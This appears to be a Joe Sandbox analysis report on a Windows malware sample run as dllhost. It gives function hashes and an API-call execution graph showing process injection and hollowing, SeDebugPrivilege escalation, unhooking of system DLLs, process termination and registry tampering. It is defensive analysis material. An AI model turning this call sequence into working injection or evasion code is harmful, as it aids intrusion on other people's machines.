                                                                                                                                                          Function 000002ADD623962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 00f68f4f3844fcd8c5fa50feb29b8af00966feac8dba22e12a7accca49031d0d
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: B5D1707BB24B408BEB609F65D44839DBBA0F757B98F104219DE8A5BB95DF34C180C782
                                                                                                                                                          Function 000002ADD6237050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 723e41556938cb520cd3acbfcb1a8de5a0e77ec4e10a763b86a2d3b792f1cc6d
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: E981AB2B724E4147FE54AB259849399EA90FB97F80F44402D9D4B4FF96DF38C842C78A
                                                                                                                                                          Function 000002ADD6239EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 3d13fda86842b367b8776a3ac6855868a785ddbdf276940a39d1c24ad52e8571
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 7251913B724A408BEB749F119548358BBA0F367F94F14412AEE9A4BF95DF38C450CB82
                                                                                                                                                          Function 000002ADD62380A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 888f14a423208018aa102f3092026acbe36b110713a8b5ed772918e463367abd
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 3F51BE3B321E408BDB54CB95D508B28BBA1F346F88F1581299A974FF88DB78C841C781
                                                                                                                                                          Function 000002ADD6239AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 442ee0d98aca26e17738369c11726853440d8e7f30a2f565789146e8bc88474b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 03619E37A24BC482DB709F15E44539AFBA0F796B88F044219EB9A0BB95DF78D190CB41

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:14.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:217
                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                          execution_graph 608 1400031c4 609 1400031d5 608->609 610 1400031fd 608->610 614 140001868 OpenProcess 609->614 613 140001868 31 API calls 613->610 615 140001cd1 614->615 616 1400018b0 IsWow64Process 614->616 615->613 617 1400018c7 CloseHandle 616->617 617->615 619 1400018ed 617->619 619->615 620 14000192f OpenProcess 619->620 620->615 621 14000194b OpenProcess 620->621 622 140001a04 NtQueryInformationProcess 621->622 623 14000196a K32GetModuleFileNameExW 621->623 626 140001cc8 CloseHandle 622->626 627 140001a29 622->627 624 1400019b3 CloseHandle 623->624 625 140001983 PathFindFileNameW lstrlenW 623->625 624->622 629 1400019c1 624->629 625->624 628 1400019a0 StrCpyW 625->628 626->615 627->626 630 140001a33 OpenProcessToken 627->630 628->624 629->622 631 1400019e0 StrCmpIW 629->631 630->626 632 140001a51 GetTokenInformation 630->632 631->626 631->629 633 140001af4 632->633 634 140001a79 GetLastError 632->634 635 140001afb CloseHandle 633->635 634->633 636 140001a84 LocalAlloc 634->636 635->626 641 140001b0f 635->641 636->633 637 140001a9a GetTokenInformation 636->637 638 140001ae2 637->638 639 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 637->639 640 140001ae9 LocalFree 638->640 639->640 640->635 641->626 642 140001b9f StrStrA 641->642 643 140001bc8 641->643 642->641 644 140001bcd 642->644 643->626 644->626 645 140001bf8 VirtualAllocEx 644->645 645->626 646 140001c27 WriteProcessMemory 645->646 646->626 647 140001c46 646->647 655 140002bfc 647->655 658 1400020cc GetModuleHandleA 655->658 659 1400020f5 658->659 660 1400020ec GetProcAddress 658->660 660->659 661 140003204 662 14000322b 661->662 663 14000341d 661->663 664 140003231 662->664 665 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 662->665 666 140003599 ReadFile 663->666 667 140003429 663->667 669 140003382 ExitProcess 664->669 670 14000323d 664->670 668 1400032c9 665->668 688 1400033c9 665->688 666->668 671 1400035c3 666->671 672 140003432 667->672 673 14000358f 667->673 675 140003246 670->675 676 1400032ea RegOpenKeyExW 670->676 671->668 677 1400035d0 GetProcessHeap HeapAlloc 671->677 678 140003534 672->678 679 14000343e 672->679 674 140001f7c 22 API calls 673->674 674->668 675->668 693 140003260 ReadFile 675->693 681 140003353 676->681 682 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 676->682 683 140001cf0 13 API calls 677->683 686 1400020fc ReadFile 678->686 684 140003443 679->684 685 140003480 679->685 680 140001868 31 API calls 680->688 721 14000217c SysAllocString SysAllocString CoInitializeEx 681->721 682->681 705 140003609 683->705 684->668 734 140002c5c 684->734 737 1400020fc 685->737 690 140003543 686->690 688->668 688->680 690->668 696 1400020fc ReadFile 690->696 692 14000335f 698 14000217c 9 API calls 692->698 693->668 699 14000328a 693->699 694 14000363e GetProcessHeap HeapFree 694->668 702 14000355a 696->702 697 140003497 ReadFile 697->668 703 1400034bf 697->703 704 14000336b 698->704 699->668 710 140001868 31 API calls 699->710 702->668 707 140003562 ShellExecuteW 702->707 703->668 708 1400034cc GetProcessHeap HeapAlloc ReadFile 703->708 729 140001f7c GetProcessHeap HeapAlloc 704->729 705->694 711 14000352f 705->711 769 140001eec 705->769 707->668 708->694 713 140003510 708->713 715 1400032b0 710->715 711->694 713->694 741 140002434 713->741 717 140001868 31 API calls 715->717 717->668 722 1400022d8 SysFreeString SysFreeString 721->722 723 1400021bd CoInitializeSecurity 721->723 722->692 724 140002205 CoCreateInstance 723->724 725 1400021f9 723->725 726 1400022d2 CoUninitialize 724->726 727 140002234 VariantInit 724->727 725->724 725->726 726->722 728 14000228a 727->728 728->726 730 140001cf0 13 API calls 729->730 732 140001fba 730->732 731 140001fe8 GetProcessHeap HeapFree 732->731 733 140001eec 5 API calls 732->733 733->732 735 1400020cc 2 API calls 734->735 736 140002c71 735->736 738 140002120 ReadFile 737->738 739 140002143 738->739 740 14000215d 738->740 739->738 739->740 740->668 740->697 742 14000246f 741->742 766 140002726 741->766 744 1400020cc 2 API calls 742->744 765 1400024ae 742->765 742->766 743 1400024d7 CreateProcessW 743->765 744->765 745 1400028e1 OpenProcess 746 1400028f1 TerminateProcess 745->746 745->765 746->765 747 1400020cc GetModuleHandleA GetProcAddress 747->765 748 140002566 VirtualAllocEx 750 140002595 WriteProcessMemory 748->750 748->765 749 14000273f VirtualAllocEx 751 14000276d WriteProcessMemory 749->751 749->765 752 1400025b7 VirtualProtectEx 750->752 750->765 753 14000278f VirtualProtectEx 751->753 751->765 752->765 753->765 754 140002858 VirtualAlloc 758 140002879 Wow64GetThreadContext 754->758 754->765 755 140002682 VirtualAlloc 757 1400026a7 GetThreadContext 755->757 755->765 756 1400027d0 WriteProcessMemory 756->765 760 1400026c4 WriteProcessMemory 757->760 757->765 761 140002891 WriteProcessMemory 758->761 758->765 759 1400025f9 WriteProcessMemory 759->765 762 1400026ef SetThreadContext 760->762 760->765 763 1400028b6 Wow64SetThreadContext 761->763 761->765 764 140002712 ResumeThread 762->764 762->765 763->765 764->765 764->766 765->743 765->745 765->747 765->748 765->749 765->754 765->755 765->756 765->759 765->766 767 140002643 VirtualProtectEx 765->767 768 14000281a VirtualProtectEx 765->768 766->711 767->765 768->765 770 140001f65 769->770 771 140001f0b OpenProcess 769->771 770->694 771->770 772 140001f23 771->772 773 140002bfc 2 API calls 772->773 774 140001f43 773->774 775 140001f5c CloseHandle 774->775 776 140001f51 CloseHandle 774->776 775->770 776->775 529 140002d38 532 140002d4c 529->532 533 140002d5e OpenMutexW 532->533 534 140002d84 CloseHandle 533->534 535 140002d77 Sleep 533->535 580 140002a0c 534->580 535->533 538 140002a0c 14 API calls 539 140002da5 GetCurrentProcessId OpenProcess 538->539 540 140002dc3 OpenProcessToken 539->540 541 140002e39 RegOpenKeyExW 539->541 544 140002dd9 LookupPrivilegeValueW 540->544 545 140002e30 CloseHandle 540->545 542 140002d41 ExitProcess 541->542 543 140002e6a RegQueryValueExW 541->543 543->542 546 140002e9a RegQueryValueExW 543->546 544->545 547 140002df0 AdjustTokenPrivileges 544->547 545->541 546->542 548 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 546->548 547->545 549 140002e2a GetLastError 547->549 548->542 550 140002f3c RegQueryValueExW 548->550 549->545 550->542 551 140002f6c RegCloseKey GetCurrentProcessId 550->551 594 14000200c GetProcessHeap HeapAlloc 551->594 581 140002a15 StrCpyW StrCatW GetModuleHandleW 580->581 582 140002bdf 580->582 581->582 583 140002a66 GetCurrentProcess K32GetModuleInformation 581->583 582->538 584 140002bd6 FreeLibrary 583->584 585 140002a96 CreateFileW 583->585 584->582 585->584 586 140002acb CreateFileMappingW 585->586 587 140002af4 MapViewOfFile 586->587 588 140002bcd CloseHandle 586->588 589 140002bc4 CloseHandle 587->589 590 140002b17 587->590 588->584 589->588 590->589 591 140002b30 lstrcmpiA 590->591 593 140002b6e 590->593 591->590 592 140002b70 VirtualProtect VirtualProtect 591->592 592->589 593->589 600 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 594->600 596 1400020a5 GetProcessHeap HeapFree 597 140002050 597->596 598 140002071 OpenProcess 597->598 598->597 599 140002087 TerminateProcess CloseHandle 598->599 599->597 601 140001e58 GetProcessHeap HeapFree GetProcessHeap HeapFree 600->601 602 140001d7d 600->602 601->597 602->601 603 140001d92 OpenProcess 602->603 605 140001e43 CloseHandle 602->605 606 140001de9 ReadProcessMemory 602->606 603->602 604 140001daf K32EnumProcessModulesEx 603->604 604->602 604->605 605->602 607 140001e0b 606->607 607->602 607->605 607->606 777 140003728 778 140003735 777->778 780 140003755 ConnectNamedPipe 778->780 781 14000374a Sleep 778->781 787 140002300 AllocateAndInitializeSid 778->787 782 1400037b3 Sleep 780->782 783 140003764 ReadFile 780->783 781->778 785 1400037be DisconnectNamedPipe 782->785 784 140003787 WriteFile 783->784 783->785 784->785 785->780 788 14000241b 787->788 789 14000235d SetEntriesInAclW 787->789 788->778 789->788 790 1400023a1 LocalAlloc 789->790 790->788 791 1400023b5 InitializeSecurityDescriptor 790->791 791->788 792 1400023c5 SetSecurityDescriptorDacl 791->792 792->788 793 1400023dc CreateNamedPipeW 792->793 793->788 794 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 795 1400036be K32EnumProcesses 794->795 796 1400036d3 795->796 797 14000371b Sleep 795->797 796->797 797->795 798 140002cb0 799 140002cbd 798->799 800 140002300 6 API calls 799->800 801 140002cd2 Sleep 799->801 802 140002cdd ConnectNamedPipe 799->802 800->799 801->799 803 140002d21 Sleep 802->803 804 140002cec ReadFile 802->804 805 140002d2c DisconnectNamedPipe 803->805 804->805 806 140002d0f 804->806 805->802 806->805

                                                                                                                                                          Callgraph

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269registrymemorythreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 14 140002e9a-140002ec4 RegQueryValueExW 11->14 12->13 15 140002df0-140002e28 AdjustTokenPrivileges 12->15 13->9 14->10 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->13 17 140002e2a GetLastError 15->17 16->10 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->13 18->10 19 140002f6c-140002f7e RegCloseKey GetCurrentProcessId call 14000200c 18->19 21 140002f83-140002fba RegCreateKeyExW 19->21 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 21->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 21->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree Sleep 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->10
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                                          • API String ID: 2725631067-1382791509
                                                                                                                                                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                                                                                                                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744
                                                                                                                                                          Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084875642-0
                                                                                                                                                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                                                                                                                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600
                                                                                                                                                          Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                                          • API String ID: 2721474350-832442975
                                                                                                                                                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                                                                                                                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704
                                                                                                                                                          Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704
                                                                                                                                                          Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 92 140002d38-140002d3c call 140002d4c 94 140002d41-140002d43 ExitProcess 92->94
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                                                                                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                                                                                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                                                                                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3805535264-0
                                                                                                                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                                                                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287memorystringnativeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
